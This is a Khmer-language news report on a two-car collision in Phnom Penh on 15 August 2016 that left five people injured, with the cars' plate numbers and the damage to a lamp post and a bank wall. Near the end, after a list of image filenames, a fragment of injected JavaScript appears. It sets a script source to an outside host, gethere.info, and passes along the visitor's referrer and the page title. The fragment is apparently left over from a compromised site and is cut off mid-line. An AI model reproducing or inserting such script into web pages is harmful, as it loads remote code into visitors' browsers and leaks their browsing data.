រថយន្តទំនើប២គ្រឿងសាកកំលាំងគ្នាមនុស្ស៥នាក់របួសធ្ងន់ស្រាល(video)

ភ្នំពេញ.យុវជនម្នាក់រួមដំណើរនិងប្រុសស្រីពីរនាក់ទៀតបើករថយន្តសេរីទំនើបBMxSមួយគ្រឿងតាមបណ្ដោយផ្លូវព្រះអង្គឌួងពីកើតទៅលិចលុះមកដល់ចំណុចកើតហេតុស្តុបកាណាឌីយ៉ា បានបួងបត់ឆ្វេង ស្រាប់តែមានរថយន្តមួយគ្រឿងទៀតម៉ាកហាយលិនឌ័របើកដោយបុរសពីរនាក់តាមបណ្ដោយផ្លូវសហពន្ធ័រុស្សីក្នុងល្បឿនលឿនដូចហោះជ្រុលទៅបុកចំពាក់កណ្ដាលពេញទំហឹងបណ្ដាលអោយរថយន្តBMរេចង្កូតទៅបុកបង្គោលភ្លើងបាក់អស់១ដើមរថយន្តមិនទាន់អស់ល្បឿនជ្រុលទៅបុកជញ្ជាំងធានាគាកម្ពុជាពាណិកម្មទៅមុខលែងរួច។ ហេតុការណ៍ដ៏រន្ធត់នេះកើតឡើងនៅវេលាម៉ោង១និង៥០នាទីយប់រំលងអធ្រាតឈានចូលថ្ងៃទី១៥ខែសីហាឆ្នាំ២០១៦ស្ថិតក្នុងសង្កាត់ផ្សារថ្មី១ខណ្ឌដូនពេញ។
តាមសាក្សីឃើញហេតុការណ៍បានអោយដឹងថាមុនពេលកើតហេតុគេឃើញយុវជនម្នាក់រួមដំណើរប្រុសស្រីពីរនាកទៀតបើករថយន្តសេរីទំនើបBM.xSពណ័សពាក់ស្លាកលេខភ្នំពេញ.2.AG2838បើកពីកើតទៅលិចយ៉ាងលឿនខណៈមកដល់ចំណុចកើតហេតុខាងលើបានបួងចង្កូតបត់ឆ្វេងស្រាប់តែមានរថយន្តហាយលិន ឌ័រពណ័ទឹកប្រាក់ពាក់ស្លាកលេខភ្នំពេញ.2.X0354បើកដោយបុរសពីរនាក់ពីលិចទៅកើតក្នុងទិសដៅបញ្ចាស់ជឲបានជ្រុលចង្កូតទៅបុកចំពាក់កណ្ដាលពេញទំហឹងធ្វើអោយរថយន្តខ្ទៀតចេញពីគ្នា១៥ម៉ែត្រហើយរថយន្តBMរេចង្កូតទៅបុកបង្គោលភ្លើងបាក់១ដើមនិងបន្តទៅបុកជញ្ជាំងធានាគាកម្ពុជាពាណិកម្មទៅមុខលែងរួចរថយន្តទាំងពីរគ្រឿងរងការខូចខាតផ្នែកខាងមុខទាំងស្រុង។
ក្រោយកើតហេតុសមត្ថកិច្ចមកដល់បានទាក់ទងហៅរថយន្តកាល់ម៉ែត្រមកដឹកជនរងគ្រោះទាំងសងខាងយកទៅសង្គ្រោះភ្លាមៗ។
ចំនែករថយន្តទាំងពីរគ្រឿងត្រូវបានសមត្ថកិច្ចជំនាញធ្វើការវាស់វែងយកទៅការិយាល័យចរាចរណ៍ជើងគោកនៃស្នងការាជធានីភ្នំពេញរង់ចាំធ្វើការដោះស្រាយគ្នាជាក្រោយ។  ដោយ៖ព្រះអង្គខ្មៅមានរិទ្ធិ

Screenshot_2016-08-15-05-43-41

IMG-20160815-WA0055 IMG-20160815-WA0054 IMG-20160815-WA0052 IMG-20160815-WA0051s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More